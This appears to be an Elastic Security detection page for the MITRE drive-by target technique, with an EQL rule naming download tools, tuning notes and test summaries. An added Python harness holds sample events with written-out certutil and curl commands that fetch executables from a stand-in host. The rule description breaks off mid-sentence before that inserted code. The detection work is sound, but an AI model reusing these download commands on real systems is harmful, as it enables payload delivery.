Detect Drive-by Target in Elastic Security
Adversaries prepare operational websites to infect systems that visit over the normal course of browsing. This involves staging malicious JavaScript, exploit kit landing pages, browser profiling code (e.g., ScanBox), or trojanized downloads on adversary-controlled or compromised legitimate websites — including watering hole attacks targeting specific communities such as government agencies, industries, or regional groups. Staging methods include injecting malicious scripts into existing web pages, modifying files served from publicly writable cloud storage buckets, and purchasing malvertising space. Because staging occurs entirely on adversary infrastructure, direct detection is not possible from the victim side. Detection strategy focuses on victim-side downstream artifacts: browsers spawning unexpected child processes (exploitation indicator), executable files dropped by browser processes to temp directories, and browser network connections to newly registered or cloud-hosted infrastructure serving executable content.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1608 Stage Capabilities
- Sub-technique: T1608.004 Drive-by Target
- Canonical reference: https://attack.mitre.org/techniques/T1608/004/
Elastic Detection Query
any where process.name : ("curl", "wget", "powershell.exe", "certutil.exe", "bitsadmin.exe") and
  (
    process.command_line : ("*.bin", "*.exe", "*.dll", "*.ps1", "*.bat", "*.vbs", "*.hta") or
    (network.direction : "egress" and destination.port in (80, 443) and
     process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe"))
  )

Elastic EQL translation of the T1608.004 detection logic. Detects victim-side indicators of drive-by targeting using Microsoft Defender for Endpoint tables. Identifies two key exploitation patterns: (1) web b
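To see how the rule's boolean structure and EQL wildcard semantics behave before deploying it, here is an added Python re-implementation of the predicate run over constructed events; this is not code from the page or from Elastic, and the event ids, paths and the 203.0.113.10 address are made up for the example.

```python
import re

# Constants copied from the EQL rule on this page
TOOLS = ("curl", "wget", "powershell.exe", "certutil.exe", "bitsadmin.exe")
PAYLOAD_GLOBS = ("*.bin", "*.exe", "*.dll", "*.ps1", "*.bat", "*.vbs", "*.hta")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe")
EGRESS_PORTS = (80, 443)


def eql_match(value, patterns):
    """Approximate EQL ':' on strings: case-insensitive, '*'/'?' wildcards, anchored to the
    whole value, so '*.exe' only matches a command line that ENDS in .exe."""
    if value is None:
        return False
    for pat in patterns:
        rx = re.escape(pat).replace(r"\*", ".*").replace(r"\?", ".")
        if re.fullmatch(rx, str(value), re.IGNORECASE | re.DOTALL):
            return True
    return False


def rule_branch(event):
    """Return 'cmdline' or 'egress' for the branch that fires, else None.
    EQL 'and' binds tighter than 'or': tool AND (payload-suffix OR (egress AND port AND parent))."""
    if not eql_match(event.get("process.name"), TOOLS):
        return None
    if eql_match(event.get("process.command_line"), PAYLOAD_GLOBS):
        return "cmdline"
    if (event.get("network.direction") == "egress"
            and event.get("destination.port") in EGRESS_PORTS
            and eql_match(event.get("process.parent.name"), OFFICE_PARENTS)):
        return "egress"
    return None


def evaluate(events):
    """Map event id -> fired branch (or None) for a batch of flattened ECS-style events."""
    return {e["id"]: rule_branch(e) for e in events}


# Constructed sample events (flattened ECS field names); 203.0.113.10 is a TEST-NET address.
SAMPLE_EVENTS = [
    {"id": "e1", "process.name": "certutil.exe", "process.parent.name": "cmd.exe",
     "process.command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/u.exe C:\\Users\\u\\AppData\\Local\\Temp\\u.exe"},
    {"id": "e2", "process.name": "POWERSHELL.EXE", "process.parent.name": "WINWORD.EXE",
     "process.command_line": "powershell.exe -nop -w hidden -c \"Start-Process notepad\"",
     "network.direction": "egress", "destination.port": 443},
    {"id": "e3", "process.name": "powershell.exe", "process.parent.name": "explorer.exe",
     "process.command_line": "powershell.exe -File C:\\scripts\\inventory.ps1 -Verbose",
     "network.direction": "egress", "destination.port": 443},
    # Browser-spawned download on Windows: process.name is "curl.exe", not "curl", so the rule as written misses it.
    {"id": "e4", "process.name": "curl.exe", "process.parent.name": "chrome.exe",
     "process.command_line": "curl.exe -o C:\\Users\\u\\AppData\\Local\\Temp\\setup.exe https://203.0.113.10/setup.exe"},
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))  # e1 cmdline, e2 egress, e3 and e4 no match
```

Event e4 is the case worth tuning for: a browser-spawned downloader is exactly the victim-side artifact the description calls out, yet the rule only fires if `process.name` is spelled as listed.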
False Positives & Tuning
- Browser extensions or plugins that legitimately spawn helper processes — e.g., PDF readers (AcroRd32.exe), video codec installers, accessibility tools launched via browser
- Legitimate software update mechanisms triggered through the browser — Chrome or Firefox update pipelines may invoke msiexec.exe or cmd.exe to apply updates
- Developer workflows using browser-based IDEs, build tools, or debugging extensions that spawn local script interpreters or Node.js processes
- Enterprise protocol handlers (custom URI schemes such as myapp://) that allow browsers to launch registered desktop applications or scripts
- Download managers integrated with browsers that save executable files to standard temp directories before user-initiated installation
Testing Methodology
Validate this detection against 4 adversary test cases from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Simulate Browser-Spawned Command Shell (Drive-by Exploitation Process Artifact)
Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, CommandLine containing 'driveby-spawn-test'. ParentImage=powershell.exe in this test (in a real attack, ParentImage would be chrome.exe or msedge.exe). Sysmon Event ID 11: File Create for driveby-spawn-test.txt in %TEMP%. Security Event ID 4688 (if command line auditing enabled) showing cmd.exe process creation with full command line.
- Test 2: Browser Executable File Drop to Temp Directory (Drive-by Payload Staging)
Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\driveby-payload-test.exe, initiating process=powershell.exe (would be chrome.exe/msedge.exe in a real attack). File has MZ magic bytes confirming PE format. SHA256 hash of the 8-byte file will be logged by Defender.
- Test 3: Drive-by Browser Fingerprinting Page Simulation (ScanBox-Style Reconnaissance)
Expected signal: Sysmon Event ID 1: Process Create for msedge.exe with --headless flag and file:// URI pointing to staged HTML. Sysmon Event ID 11: File Create for scanbox-sim.html in %TEMP% by PowerShell. Sysmon Event ID 3: Network Connection attempt from msedge.exe to 127.0.0.1:19876 (connection will fail — no listener — but the event fires). Browser console output (captured via --dump-dom) shows the fingerprinting script execution.
- Test 4: Watering Hole Injection Simulation — Malicious Script Tag in Web Page
Expected signal: Sysmon Event ID 11: File Create for watering-hole-sim.html in %TEMP% by PowerShell. The file contains hex-encoded JavaScript obfuscation patterns (\x64\x6f\x63...) and Base64-encoded lure text matching SocGholish-style fake browser update prompts. SHA256 of the file can be submitted to threat intel platforms. In a real attack, this content would be injected into a legitimate website's HTML and served to visitors.
References (8)
- https://attack.mitre.org/techniques/T1608/004/
- https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
- http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
- https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1608.004/T1608.004.md